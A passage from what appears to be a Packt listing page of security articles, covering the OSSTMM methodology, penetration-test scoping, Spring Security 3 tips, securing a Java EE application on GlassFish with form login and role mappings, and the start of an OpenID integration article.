address the target testing criteria and remains consistent with its network or application environment. There are many security testing methodologies which claim to be perfect in finding all security issues, but choosing the best one still requires a careful selection process under which one can determine the accountability, cost, and effectiveness of the assessment at optimum level. Thus, determining the right assessment strategy depends on several factors, including the technical details provided about the target environment, resource availability, PenTester's knowledge, business objectives, and regulatory concerns. From a business standpoint, investing blind capital and serving unwanted resources to a security testing process can put the whole business economy in danger. Open Source Security Testing Methodology Manual (OSSTMM) The OSSTMM is a recognized international standard for security testing and analysis and is being used by many organizations in their day-to-day assessment cycle. It is purely based on scientific method which assists in quantifying the operational security and its cost requirements in concern with the business objectives. From a technical perspective, its methodology is divided into four key groups, that is, Scope, Channel, Index, and Vector. The scope defines a process of collecting information on all assets operating in the target environment. A channel determines the type of communication and interaction with these assets, which can be physical, spectrum, and communication. All of these channels depict a unique set of security components that has to be tested and verified during the assessment period. These components comprise of physical security, human psychology, data networks, wireless communication medium, and telecommunication. The index is a method which is considerably useful while classifying these target assets corresponding to their particular identifications, such as, MAC Address, and IP Address. At the end, a vector concludes the direction by which an auditor can assess and analyze each functional asset. This whole process initiates a technical roadmap towards evaluating the target environment thoroughly and is known as Audit Scope. There are different forms of security testing which have been classified under OSSTMM methodology and their organization is presented within six standard security test types: Blind: The blind testing does not require any prior knowledge about the target system. But the target is informed before the execution of an audit scope. Ethical hacking and war gaming are examples of blind type testing. This kind of testing is also widely accepted because of its ethical vision of informing a target in advance. Double blind: In double blind testing, an auditor does not require any knowledge about the target system nor is the target informed before the test execution. Black-box auditing and penetration testing are examples of double blind testing. Most of the security assessments today are carried out using this strategy, thus, putting a real challenge for auditors to select the best of breed tools and techniques in order to achieve their required goal. Gray box: In gray box testing, an auditor holds limited knowledge about the target system and the target is also informed before the test is executed. Vulnerability assessment is one of the basic examples of gray box testing. Double gray box: The double gray box testing works in a similar way to gray box testing, except the time frame for an audit is defined and there are no channels and vectors being tested. White-box audit is an example of double gray box testing. Tandem: In tandem testing, the auditor holds minimum knowledge to assess the target system and the target is also notified in advance before the test is executed. It is fairly noted that the tandem testing is conducted thoroughly. Crystal box and in-house audit are examples of tandem testing. Reversal: In reversal testing, an auditor holds full knowledge about the target system and the target will never be informed of how and when the test will be conducted. Red-teaming is an example of reversal type testing. Which OSSTMM test type follows the rules of Penetration Testing? Double blind testing The technical assessment framework provided by OSSTMM is flexible and capable of deriving certain test cases which are logically divided into five security components of three consecutive channels, as mentioned previously. These test cases generally examine the target by assessing its access control security, process security, data controls, physical location, perimeter protection, security awareness level, trust level, fraud control protection, and many other procedures. The overall testing procedures focus on what has to be tested, how it should be tested, what tactics should be applied before, during and after the test, and how to interpret and correlate the final results. Capturing the current state of protection of a target system by using security metrics is considerably useful and invaluable. Thus, the OSSTMM methodology has introduced this terminology in the form of RAV (Risk Assessment Values). The basic function of RAV is to analyze the test results and compute the actual security value based on three factors, which are operational security, loss controls, and limitations. This final security value is known as RAV Score. By using RAV score an auditor can easily extract and define the milestones based on the current security posture to accomplish better protection. From a business perspective, RAV can optimize the amount of investment required on security and may help in the justification of better available solutions. Key features and benefits Practicing the OSSTMM methodology substantially reduces the occurrence of false negatives and false positives and provides accurate measurement for the security. Its framework is adaptable to many types of security tests, such as penetration testing, white-box audit, vulnerability assessment, and so forth. It ensures the assessment should be carried out thoroughly and that of the results can be aggregated into consistent, quantifiable, and reliable manner. The methodology itself follows a process of four individually connected phases, namely definition phase, information phase, regulatory phase, and controls test phase. Each of which obtain, assess, and verify the information regarding the target environment. Evaluating security metrics can be achieved using the RAV method. The RAV calculates the actual security value based on operational security, loss controls, and limitations. The given output known as the RAV score represents the current state of target security. Formalizing the assessment report using the Security Test Audit Report (STAR) template can be advantageous to management, as well as the technical team to review the testing objectives, risk assessment values, and the output from each test phase. The methodology is regularly updated with new trends of security testing, regulations, and ethical concerns. The OSSTMM process can easily be coordinated with industry regulations, business policy, and government legislations. Additionally, a certified audit can also be eligible for accreditation from ISECOM (Institute for Security and Open Methodologies) directly.
Read more
  • 0
  • 0
  • 8621

article-image-backtrack-4-target-scoping
Packt
15 Apr 2011
9 min read
Save for later

BackTrack 4: Target scoping

Packt
15 Apr 2011
9 min read
What is target scoping? Target Scoping is defined as an empirical process for gathering target assessment requirements and characterizing each of its parameters to generate a test plan, limitations, business objectives, and time schedule. This process plays an important role in defining clear objectives towards any kind of security assessment. By determining these key objectives one can easily draw a practical roadmap of what will be tested, how it should be tested, what resources will be allocated, what limitations will be applied, what business objectives will be achieved, and how the test project will be planned and scheduled. Thus, we have combined all of these elements and presented them in a formalized scope process to achieve the required goal. Following are the key concepts which will be discussed in this article: Gathering client requirements deals with accumulating information about the target environment through verbal or written communication. Preparing test plan depends on different sets of variables. These may include shaping the actual requirements into structured testing process, legal agreements, cost analysis, and resource allocation. Profiling test boundaries determines the limitations associated with the penetration testing assignment. These can be a limitation of technology, knowledge, or a formal restriction on the client's IT environment. Defining business objectives is a process of aligning business view with technical objectives of the penetration testing program. Project management and scheduling directs every other step of the penetration testing process with a proper timeline for test execution. This can be achieved by using a number of advanced project management tools. It is highly recommended to follow the scope process in order to ensure test consistency and greater probability of success. Additionally, this process can also be adjusted according to the given situation and test factors. Without using any such process, there will be a greater chance of failure, as the requirements gathered will have no proper definitions and procedures to follow. This can lead the whole penetration testing project into danger and may result in unexpected business interruption. Paying special attention at this stage to the penetration testing process would make an excellent contribution towards the rest of the test phases and clear the perspectives of both technical and management areas. The key is to acquire as much information beforehand as possible from the client to formulate a strategic path that reflects multiple aspects of penetration testing. These may include negotiable legal terms, contractual agreement, resource allocation, test limitations, core competencies, infrastructure information, timescales, and rules of engagement. As a part of best practices, the scope process addresses each of the attributes necessary to kickstart our penetration testing project in a professional manner. As we can see in the preceding screenshot, each step constitutes unique information that is aligned in a logical order to pursue the test execution successfully. Remember, the more information that is gathered and managed properly, the easier it will be for both the client and the penetration testing consultant to further understand the process of testing. This also governs any legal matters to be resolved at an early stage. Hence, we will explain each of these steps in more detail in the following section. Gathering client requirements This step provides a generic guideline that can be drawn in the form of a questionnaire to devise all information about target infrastructure from a client. A client can be any subject who is legally and commercially bounded to the target organization. Such that, it is critical for the success of the penetration testing project to identify all internal and external stakeholders at an early stage of a project and analyze their levels of interest, expectations, importance, and influence. A strategy can then be developed for approaching each stakeholder with their requirements and involvement in the penetration testing project to maximize positive influences and mitigate potential negative impacts. It is solely the duty of the penetration tester to verify the identity of the contracting party before taking any further steps. The basic purpose of gathering client requirements is to open a true and authentic channel by which the pentester can obtain any information that may be necessary for the testing process. Once the test requirements have been identified, they should be validated by a client in order to remove any misleading information. This will ensure that the developed test plan is consistent and complete. We have listed some of the commonly asked questions that can be used in a conventional customer requirements form and the deliverables assessment form. It is important to note that this list can be extended or shortened according to the goal of a client and that the client must retain enough knowledge about the target environment. Customer requirements form Collecting company's information such as company name, address, website, contact person details, e-mail address, and telephone number. What are your key objectives behind the penetration testing project? Determining the penetration test type (with or without specific criteria): Black-box testing or external testing White-box testing or internal testing Informed testing Uninformed testing Social engineering included Social engineering excluded Investigate employees background information Adopt employee's fake identity Denial of Service included Denial of Service excluded Penetrate business partner systems How many servers, workstations, and network devices need to be tested? What operating system technologies are supported by your infrastructure? Which network devices need to be tested? Firewalls, routers, switches, modems, load balancers, IDS, IPS, or any other appliance? Is there any disaster recovery plan in place? If yes, who is managing it? Are there any security administrators currently managing your network? Is there any specific requirement to comply with industry standards? If yes, please list them. Who will be the point of contact for this project? What is the timeline allocated for this project? In weeks or days. What is your budget for this project? List any other requirements as necessary. Deliverables assessment form What types of reports are expected? Executive reports Technical assessment reports Developer reports In which format do you want the report to be delivered? PDF, HTML, or DOC. How should the report be submitted? E-mail or printed. Who is responsible for receiving these reports? Employee Shareholder Stakeholder By using such a concise and comprehensive inquiry form, you can easily extract the customer requirements and fulfill the test plan accordingly. Preparing the test plan As the requirements have been gathered and verified by a client, it is now time to draw a formal test plan that should reflect all of these requirements, in addition to other necessary information on legal and commercial grounds of the testing process. The key variables involved in preparing a test plan are a structured testing process, resource allocation, cost analysis, non-disclosure agreement, penetration testing contract, and rules of engagement. Each of these areas will be addressed with their short descriptions below: Structured testing process: After analyzing the details provided by our customer, it may be important to re-structure the BackTrack testing methodology. For instance, if the social engineering service was excluded then we would have to remove it from our formal testing process. This practice is sometimes known as Test Process Validation. It is a repetitive task that has to be visited whenever there is a change in client requirements. If there are any unnecessary steps involved during the test execution then it may result in a violation of the organization's policies and incur serious penalties. Additionally, based on the test type there would be a number of changes to the test process. Such that, white-box testing does not require information gathering and target discovery phase because the auditor is already aware of the internal infrastructure. Resource allocation: Determining the expertise knowledge required to achieve completeness of a test is one of the substantial areas. Thus, assigning a skilled penetration tester for a certain task may result in better security assessment. For instance, an application penetration testing requires a dedicated application security tester. This activity plays a significant role in the success of penetration testing assignment. Cost analysis: The cost for penetration testing depends on several factors. This may involve the number of days allocated to fulfill the scope of a project, additional service requirements such as social engineering and physical security assessment, and the expertise knowledge required to assess the specific technology. From the industry viewpoint, this should combine a qualitative and quantitative value. Non-disclosure Agreement (NDA): Before starting the test process it is necessary to sign the agreement which may reflect the interests of both parties "client" and "penetration tester". Using such a mutual non-disclosure agreement should clear the terms and conditions under which the test should be aligned. It is important for the penetration tester to comply with these terms throughout the test process. Violating any single term of agreement can result in serious penalties or permanent exemption from the job. Penetration testing contract: There is always a need for a legal contract which will reflect all the technical matters between the "client" and "penetration tester". This is where the penetration testing contract comes in. The basic information inside such contracts focus on what testing services are being offered, what their main objectives are, how they will be conducted, payment declaration, and maintaining the confidentiality of a whole project. Rules of engagement: The process of penetration testing can be invasive and requires clear understanding of what the assessment demands, what support will be provided by the client, and what type of potential impact or effect each assessment technique may have. Moreover, the tools used in the penetration testing processes should clearly state their purpose so that the tester can use them accordingly. The rules of engagement define all of these statements in a more detailed fashion to address the necessity of technical criteria that should be followed during the test execution. By preparing each of these subparts of the test plan, you can ensure the consistent view of a penetration testing process. This will provide a penetration tester with more specific assessment details that has been processed from the client requirements. It is always recommended to prepare a test plan checklist which can be used to verify the assessmnt criteria and its underlying terms with the contracting party.
Read more
  • 0
  • 0
  • 10758
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-spring-security-3-tips-and-tricks
Packt
28 Feb 2011
6 min read
Save for later

Spring Security 3: Tips and Tricks

Packt
28 Feb 2011
6 min read
  Spring Security 3 Make your web applications impenetrable. Implement authentication and authorization of users. Integrate Spring Security 3 with common external security providers. Packed full with concrete, simple, and concise examples. It's a good idea to change the default value of the spring_security_login page URL. Tip: Not only would the resulting URL be more user- or search-engine friendly, it'll disguise the fact that you're using Spring Security as your security implementation. Obscuring Spring Security in this way could make it harder for malicious hackers to find holes in your site in the unlikely event that a security hole is discovered in Spring Security. Although security through obscurity does not reduce your application's vulnerability, it does make it harder for standardized hacking tools to determine what types of vulnerabilities you may be susceptible to.   Evaluating authorization rules Tip: For any given URL request, Spring Security evaluates authorization rules in top to bottom order. The first rule matching the URL pattern will be applied. Typically, this means that your authorization rules will be ordered starting from most-specific to least-specific order. It's important to remember this when developing complicated rule sets, as developers can often get confused over which authorization rule takes effect. Just remember the top to bottom order, and you can easily find the correct rule in any scenario!   Using the JSTL URL tag to handle relative URLs Tip: : Use the JSTL core library's url tag to ensure that URLs you provide in your JSP pages resolve correctly in the context of your deployed web application. The url tag will resolve URLs provided as relative URLs (starting with a /) to the root of the web application. You may have seen other techniques to do this using JSP expression code (<%=request.getContextPath() %>), but the JSTL url tag allows you to avoid inline code!   Modifying username or password and the remember me Feature Tip: You have anticipated that if the user changes their username or password, any remember me tokens set will no longer be valid. Make sure that you provide appropriate messaging to users if you allow them to change these bits of their account.   Configuration of remember me session cookies Tip: If token-validity-seconds is set to -1, the login cookie will be set to a session cookie, which does not persist after the user closes their browser. The token will be valid (assuming the user doesn't close their browser) for a non-configurable length of 2 weeks. Don't confuse this with the cookie that stores your user's session ID—they're two different things with similar names!   Checking Full Authentication without Expressions Tip: If your application does not use SpEL expressions for access declarations, you can still check if the user is fully authenticated by using the IS_ AUTHENTICATED_FULLY access rule (For example, .access="IS_AUTHENTICATED_FULLY"). Be aware, however, that standard role access declarations aren't as expressive as SpEL ones, so you will have trouble handling complex boolean expressions.   Debugging remember me cookies Tip: There are two difficulties when attempting to debug issues with remember me cookies. The first is getting the cookie value at all! Spring Security doesn't offer any log level that will log the cookie value that was set. We'd suggest a browser-based tool such as Chris Pederick's Web Developer plug-in (http://chrispederick.com/work/web-developer/) for Mozilla Firefox. Browser-based development tools typically allow selective examination (and even editing) of cookie values. The second (admittedly minor) difficulty is decoding the cookie value. You can feed the cookie value into an online or offline Base64 decoder (remember to add a trailing = sign to make it a valid Base64-encoded string!)   Making effective use of an in-memory UserDetailsService Tip: A very common scenario for the use of an in-memory UserDetailsService and hard-coded user lists is the authoring of unit tests for secured components. Unit test authors often code or configure the minimal context to test the functionality of the component under test. Using an in-memory UserDetailsService with a well-defined set of users and GrantedAuthority values provides the test author with an easily controlled test environment.   Storing sensitive information Tip: Many guidelines that apply to storage of passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways, for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards).   Annotations at the class level Tip: Be aware that the method-level security annotations can also be applied at the class level as well! Method-level annotations, if supplied, will always override annotations specified at the class level. This can be helpful if your business needs dictate specification of security policies for an entire class at a time. Take care to use this functionality in conjunction with good comments and coding standards, so that developers are very clear about the security characteristics of a class and its methods.   Authenticating the user against LDAP Tip: Do not make the very common mistake of configuring an <authentication-provider> with a user-details-service-ref referring to an LdapUserDetailsService, if you are intending to authenticate the user against LDAP itself!   Externalize URLs and environment-dependent settings Tip: Coding URLs into Spring configuration files is a bad idea. Typically, storage and consistent reference to URLs is pulled out into a separate properties file, with placeholders consistent with the Spring PropertyPlaceholderConfigurer. This allows for reconfiguration of environment-specific settings via externalizable properties files without touching the Spring configuration files, and is generally considered good practice. Summary In this article we took a look at some of the tips and tricks for Spring Security. Further resources on this subject: Spring Security 3 [Book] Migration to Spring Security 3 [Article] Opening up to OpenID with Spring Security [Article] Spring Security: Configuring Secure Passwords [Article]
Read more
  • 0
  • 0
  • 25714

article-image-designing-secure-java-ee-applications-glassfish
Packt
31 May 2010
2 min read
Save for later

Designing Secure Java EE Applications in GlassFish

Packt
31 May 2010
2 min read
Security is an orthogonal concern for an application and we should assess it right from the start by reviewing the analysis we receive from business and functional analysts. Assessing the security requirements results in understanding the functionalities we need to include in our architecture to deliver a secure application covering the necessary requirements. Security necessities can include a wide area of requirements, which may vary from a simple authentication to several sub-systems. A list of these sub-systems includes identity and access management system and transport security, which can include encrypting data as well. In this article series, we will develop a secure Java EE application based on Java EE and GlassFish capabilities. In course of the article, we will cover the following topics: Analyzing Java EE application security requirements Including security requirements in Java EE application design Developing secure Business layer using EJBs Developing secure Presentation layer using JSP and Servlets Configuring deployment descriptors of Java EE applications Specifying security realm for enterprise applications Developing secure application client module Configuring Application Client Container Developing Secure Java EE Applications in GlassFish is the second part of this article series. Understanding the sample application The sample application that we are going to develop, converts different length measurement units into each other. Our application converts meter to centimeter, millimeter, and inch. The application also stores usage statistics for later use cases. Guest users who prefer not to log in can only use meter to centimeter conversion, while any company employee can use meter to centimeter and meter to millimeter conversion, and finally any of company's managers can access meter to inch in addition to two other conversion functionalities. We should show a custom login page to comply with site-wide look and feel. No encryption is required for communication between clients and our application but we need to make sure that no one can intercept and steal the username and passwords provided by members. All members' identification information is stored in the company's wide directory server. The following diagram shows the high-level functionality of the sample application: We have login action and three conversion actions. Users can access some of them after logging in and some of them can be accessed without logging in.
Read more
  • 0
  • 0
  • 9689

article-image-developing-secure-java-ee-applications-glassfish
Packt
31 May 2010
14 min read
Save for later

Developing Secure Java EE Applications in GlassFish

Packt
31 May 2010
14 min read
In this article series, we will develop a secure Java EE application based on Java EE and GlassFish capabilities. In course of the article, we will cover following topics: Analyzing Java EE application security requirements Including security requirements in Java EE application design Developing secure Business layer using EJBs Developing secure Presentation layer using JSP and Servlets Configuring deployment descriptors of Java EE applications Specifying security realm for enterprise applications Developing secure application client module Configuring Application Client Container Read Designing Secure Java EE Applications in GlassFish here. Developing the Presentation layer The Presentation layer is the closest layer to end users when we are developing applications that are meant to be used by humans instead of other applications. In our application, the Presentation layer is a Java EE web application consisting of the elements listed in the following table. In the table you can see that different JSP files are categorized into different directories to make the security description easier. Element Name Element Description Index.jsp Application entry point. It has some links to functional JSP pages like toMilli.jsp and so on. auth/login.html This file presents a custom login page to user when they try to access a restricted resource. This file is placed inside auth directory of the web application. auth/logout.jsp Logging users out of the system after their work is finished. auth/loginError.html Unsuccessful login attempt redirect users to this page. This file is placed inside auth directory of the web application jsp/toInch.jsp Converts given length to inch, it is only available for managers. jsp/toMilli.jsp Converts given length to millimeter, this page is available to any employee. jsp/toCenti.jsp Converts given length to centimeter, this functionality is available for everyone. Converter Servlet Receives the request and invoke the session bean to perform the conversion and returns back the value to user. auth/accessRestricted.html An error page for error 401 which happens when authorization fails. Deployment Descriptors The deployment descriptors which we describe the security constraints over resources we want to protect. Now that our application building blocks are identified we can start implementing them to complete the application. Before anything else let's implement JSP files that provides the conversion GUI. The directory layout and content of the Web module is shown in the following figure: Implementing the Conversion GUI In our application we have an index.jsp file that acts as a gateway to the entire system and is shown in the following listing: <html> <head><title>Select A conversion</title></head> <body><h1>Select A conversion</h1> <a href="auth/login.html">Login</a> <br/> <a href="jsp/toCenti.jsp">Convert Meter to Centimeter</a> <br/> <a href="jsp/toInch.jsp">Convert Meter to Inch</a> <br/> <a href="jsp/toMilli.jsp">Convert to Millimeter</a><br/> <a href="auth/logout.jsp">Logout</a> </body> </html> Implementing the Converter servlet The Converter servlet receives the conversion value and method from JSP files and calls the corresponding method of a session bean to perform the actual conversion. The following listing shows the Converter servlet content: @WebServlet(name="Converter", urlPatterns={"/Converter"}) public class Converter extends HttpServlet { @EJB private ConversionLocal conversionBean; protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { } @Override protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { System.out.println("POST"); response.setContentType("text/html;charset=UTF-8"); PrintWriter out = response.getWriter(); try{ int valueToconvert = Integer.parseInt(request.getParameter("meterValue")); String method = request.getParameter("method"); out.print("<hr/> <center><h2>Conversion Result is: "); if (method.equalsIgnoreCase("toMilli")) { out.print(conversionBean.toMilimeter(valueToconvert)); } else if (method.equalsIgnoreCase("toCenti")) { out.print(conversionBean.toCentimeter(valueToconvert)); } else if (method.equalsIgnoreCase("toInch")) { out.print(conversionBean.toInch(valueToconvert)); } out.print("</h2></center>"); }catch (AccessLocalException ale) { response.sendError(401); }finally { out.close(); } } } Starting from the beginning we are using annotation to configure the servlet mapping and servlet name instead of using the deployment descriptor for it. Then we use dependency injection to inject an instance of Conversion session bean into the servlet and decide which one of its methods we should invoke based on the conversion type that the caller JSP sends as a parameter. Finally, we catch javax.ejb.AccessLocalException and send an HTTP 401 error back to inform the client that it does not have the required privileges to perform the requested action. The following figure shows what the result of invocation could look like: Each servlet needs some description elements in the deployment descriptor or included as deployment descriptor elements. Implementing the conversion JSP files is the last step in implementing the functional pieces. In the following listing you can see content of the toMilli.jsp file. <html> <head><title>Convert To Millimeter</title></head> <body><h1>Convert To Millimeter</h1> <form method=POST action="../Converter">Enter Value to Convert: <input name=meterValue> <input type="hidden" name="method" value="toMilli"> <input type="submit" value="Submit" /> </form> </body> </html> The toCenti.jsp and toInch.jsp files look the same except for the descriptive content and the value of the hidden parameter which will be toCenti and toInch respectively for toCenti.jsp and toInch.jsp. Now we are finished with the functional parts of the Web layer; we just need to implement the required GUI for security measures. Implementing the authentication frontend For the authentication, we should use a custom login page to have a unified look and feel in the entire web frontend of our application. We can use a custom login page with the FORM authentication method. To implement the FORM authentication method we need to implement a login page and an error page to redirect the users to that page in case authentication fails. Implementing authentication requires us to go through the following steps: Implementing login.html and loginError.html Including security description in the web.xml and sun-web.xml or sun-application.xml Implementing a login page In FORM authentication we implement our own login form to collect username and password and we then pass them to the container for authentication. We should let the container know which field is username and which field is password by using standard names for these fields. The username field is j_username and the password field is j_password. To pass these fields to container for authentication we should use j_security_check as the form action. When we are posting to j_security_check the servlet container takes action and authenticates the included j_username and j_password against the configured realm. The listing below shows login.html content. <form method="POST" action="j_security_check"> Username: <input type="text" name="j_username"><br /> Password: <input type="password" name="j_password"><br /> <br /> <input type="submit" value="Login"> <input type="reset" value="Reset"> </form> The following figure shows the login page which is shown when an unauthenticated user tries to access a restricted resource: Implementing a logout page A user may need to log out of our system after they're finished using it. So we need to implement a logout page. The following listing shows the logout.jsp file: <% session.invalidate(); %> <body> <center> <h1>Logout</h1> You have successfully logged out. </center> </body> Implementing a login error page And now we should implement LoginError.html, an authentication error page to inform user about its authentication failure. <html> <body> <h2>A Login Error Occurred</h2> Please click <a href="login.html">here</a> for another try. </body> </html> Implementing an access restricted page When an authenticated user with no required privileges tries to invoke a session bean method, the EJB container throws a javax.ejb.AccessLocalException. To show a meaningful error page to our users we should either map this exception to an error page or we should catch the exception, log the event for audition purposes, and then use the sendError() method of the HttpServletResponse object to send out an error code. We will map the HTTP error code to our custom web pages with meaningful descriptions using the web.xml deployment descriptor. You will see which configuration elements we will use to do the mapping. The following snippet shows AccessRestricted.html file: <body> <center> <p>You need to login to access the requested resource. To login go to <a href="auth/login.html">Login Page</a></p></center> </body> Configuring deployment descriptors So far we have implemented required files for the FORM-based authentication and we only need to include required descriptions in the web.xml file. Looking back at the application requirement definitions, we see that anyone can use meter to centimeter conversion functionality and any other functionality that requires the user to login. We use three different HTML pages for different types of conversion. We do not need any constraint on toCentimeter.html therefore we do not need to include any definition for it. Per application description, any employee can access the toMilli.jsp page. Defining security constraint for this page is shown in the following listing: <security-constraint> <display-name>You should be an employee</display-name> <web-resource-collection> <web-resource-name>all</web-resource-name> <description/> <url-pattern>/jsp/toMillimeter.html</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> <http-method>DELETE</http-method> </web-resource-collection> <auth-constraint> <description/> <role-name>employee_role</role-name> </auth-constraint> </security-constraint> We should put enough constraints on the toInch.jsp page so that only managers can access the page. The listing included below shows the security constraint definition for this page. <security-constraint> <display-name>You should be a manager</display-name> <web-resource-collection> <web-resource-name>Inch</web-resource-name> <description/> <url-pattern>/jsp/toInch.html</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <auth-constraint> <description/> <role-name>manager_role</role-name> </auth-constraint> </security-constraint> Finally we need to define any role we used in the deployment descriptor. The following snippet shows how we define these roles in the web.xml page. <security-role> <description/> <role-name>manager_role</role-name> </security-role> <security-role> <description/> <role-name>employee_role</role-name> </security-role> Looking back at the application requirements, we need to define data constraint and ensure that username and passwords provided by our users are safe during transmission. The following listing shows how we can define the data constraint on the login.html page. <security-constraint> <display-name>Login page Protection</display-name> <web-resource-collection> <web-resource-name>Authentication</web-resource-name> <description/> <url-pattern>/auth/login.html</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <user-data-constraint> <description/> <transport-guarantee>CONFIDENTIAL</transport-guarantee> </user-data-constraint> </security-constraint> One more step and our web.xml file will be complete. In this step we define an error page for HTML 401 error code. This error code means that application server is unable to perform the requested action due to negative authorization result. The following snippet shows the required elements to define this error page. <error-page> <error-code>401</error-code> <location>AccessRestricted.html</location> </error-page> Now that we are finished with declaring the security we can create the conversion pages and after creating these pages we can start with Business layer and its security requirements. Specifying the security realm Up to this point we have defined all the constraints that our application requires but we still need to follow one more step to complete the application's security configuration. The last step is specifying the security realm and authentication. We should specify the FORM authentication and per-application description; authentication must happen against the company-wide LDAP server. Here we are going to use the LDAP security realm LDAPRealm. We need to import a new LDIF file into our LDAP server, which contains groups and users definition required for this article. To import the file we can use the following command, assuming that you downloaded the source code bundle from https://www.packtpub.com//sites/default/files/downloads/9386_Code.zip and you have it extracted. import-ldif --ldifFile path/to/chapter03/users.ldif --backendID userRoot --clearBackend --hostname 127.0.0.1 --port 4444 --bindDN cn=gf cn=admin --bindPassword admin --trustAll --noPropertiesFile The following table show users and groups that are defined inside the users.ldif file. Username and password Group membership james/james manager, employee meera/meera employee We used OpenDS for the realm data storage and it had two users, one in the employee group and the other one in the manager group. To configure the authentication realm we need to include the following snippet in the web.xml file. <login-config> <auth-method>FORM</auth-method> <realm-name>LDAPRealm</realm-name> <form-login-config> <form-login-page>/auth/login.html</form-login-page> <form-error-page>/auth/loginError.html</form-error-page> </form-login-config> </login-config> If we look at our Web and EJB modules as separate modules we must specify the role mappings for each module separately using the GlassFish deployment descriptors, which are sun-web.xml and sun-ejb.xml. But we are going to bundle our modules as an Enterprise Application Archive (EAR) file so we can use the GlassFish deployment descriptor for enterprise applications to define the role mapping in one place and let all modules use that definitions. The following listing shows roles and groups mapping in the sun-application.xml file. <sun-application> <security-role-mapping> <role-name>manager_role</role-name> <group-name>manager</group-name> </security-role-mapping> <security-role-mapping> <role-name>employee_role</role-name> <group-name>employee</group-name> </security-role-mapping> <realm>LDAPRealm</realm> </sun-application> The security-role-mapping element we used in sun-application.xml has the same schema as the security-role-mapping element of the sun-web.xml and sun-ejb-jar.xml files. You should have noticed that we have a realm element in addition to role mapping elements. We can use the realm element of the sun-application.xml to specify the default authentication realm for the entire application instead of specifying it for each module separately. Summary In this article series, we covered the following topics: Analyzing Java EE application security requirements Including security requirements in Java EE application design Developing secure Business layer using EJBs Developing secure Presentation layer using JSP and Servlets Configuring deployment descriptors of Java EE applications Specifying security realm for enterprise applications Developing secure application client module Configuring Application Client Container We learnt how to develop a secure Java EE application with all standard modules including Web, EJB, and application client modules.
Read more
  • 0
  • 0
  • 5734

article-image-opening-openid-spring-security
Packt
27 May 2010
7 min read
Save for later

Opening up to OpenID with Spring Security

Packt
27 May 2010
7 min read
(For more resources on Spring, see here.) The promising world of OpenID The promise of OpenID as a technology is to allow users on the web to centralize their personal data and information with a trusted provider, and then use the trusted provider as a delegate to establish trustworthiness with other sites with whom the user wants to interact. In concept, this type of login through a trusted third party has been in existence for a long time, in many different forms (Microsoft Passport, for example, became one of the more notable central login services on the web for some time). OpenID's distinct advantage is that the OpenID Provider needs to implement only the public OpenID protocol to be compatible with any site seeking to integrate login with OpenID. The OpenID specification itself is an open specification, which leads to the fact that there is currently a diverse population of public providers up and running the same protocol. This is an excellent recipe for healthy competition and it is good for consumer choice. The following diagram illustrates the high-level relationship between a site integrating OpenID during the login process and OpenID providers. We can see that the user presents his credentials in the form of a unique named identifier, typically a Uniform Resource Identifier (URI), which is assigned to the user by their OpenID provider, and is used to uniquely identify both the user and the OpenID provider. This is commonly done by either prepending a subdomain to the URI of the OpenID provider (for example, https://jamesgosling.myopenid.com/), or appending a unique identifier to the URI of the OpenID provider URI (for example, https://me.yahoo.com/jamesgosling). We can visually see from the presented URI that both methods clearly identify both the OpenID provider(via domain name) and the unique user identifier. Don't trust OpenID unequivocally! You can see here a fundamental assumption that can fool users of the system. It is possible for us to sign up for an OpenID, which would make it appear as though we were James Gosling, even though we obviously are not. Do not make the false assumption that just because a user has a convincing-sounding OpenID (or OpenID delegate provider) they are the authentic person, without requiring additional forms of identification. Thinking about it another way, if someone came to your door just claiming he was James Gosling, would you let him in without verifying his ID? The OpenID-enabled application then redirects the user to the OpenID provider, at which the user presents his credentials to the provider, which is then responsible for making an access decision. Once the access decision has been made by the provider, the provider redirects the user to the originating site, which is now assured of the user's authenticity. OpenID is much easier to understand once you have tried it. Let's add OpenID to the JBCP Pets login screen now! Signing up for an OpenID In order to get the full value of exercises in this section (and to be able to test login), you'll need your own OpenID from one of the many available providers, of which a partial listing is available at http://openid.net/get-an-openid/. Common OpenID providers with which you probably already have an account are Yahoo!, AOL, Flickr, or MySpace. Google's OpenID support is slightly different, as we'll see later in this article when we add Sign In with Google support to our login page. To get full value out of the exercises in this article, we recommend you have accounts with at least: myOpenID Google Enabling OpenID authentication with Spring Security Spring Security provides convenient wrappers around provider integrations that are actually developed outside the Spring ecosystem. In this vein, the openid4java project ( http://code.google.com/p/openid4java/) provides the underlying OpenID provider discovery and request/response negotiation for the Spring Security OpenID functionality. Writing an OpenID login form It's typically the case that a site will present both standard (username and password) and OpenID login options on a single login page, allowing the user to select from one or the other option, as we can see in the JBCP Pets target login page. The code for the OpenID-based form is as follows: <h1>Or, Log Into Your Account with OpenID</h1> <p> Please use the form below to log into your account with OpenID. </p> <form action="j_spring_openid_security_check" method="post"> <label for="openid_identifier">Login</label>: <input id="openid_identifier" name="openid_identifier" size="20" maxlength="100" type="text"/> <img src="images/openid.png" alt="OpenID"/> <br /> <input type="submit" value="Login"/> </form> The name of the form field, openid_identifier, is not a coincidence. The OpenID specification recommends that implementing websites use this name for their OpenID login field, so that user agents (browsers) have the semantic knowledge of the function of this field. There are even browser plug-ins such as Verisign's OpenID SeatBelt ( https://pip.verisignlabs.com/seatbelt.do), which take advantage of this knowledge to pre-populate your OpenID credentials into any recognizable OpenID field on a page. You'll note that we don't offer the remember me option with OpenID login. This is due to the fact that the redirection to and from the vendor causes the remember me checkbox value to be lost, such that when the user's successfully authenticated, they no longer have the remember me option indicated. This is unfortunate, but ultimately increases the security of OpenID as a login mechanism for our site, as OpenID forces the user to establish a trust relationship through the provider with each and every login. Configuring OpenID support in Spring Security Turning on basic OpenID support, via the inclusion of a servlet filter and authentication provider, is as simple as adding a directive to our <http> configuration element in dogstore-security.xml as follows:/   <http auto-config="true" ...> <!-- Omitting content... --> <openid-login/> 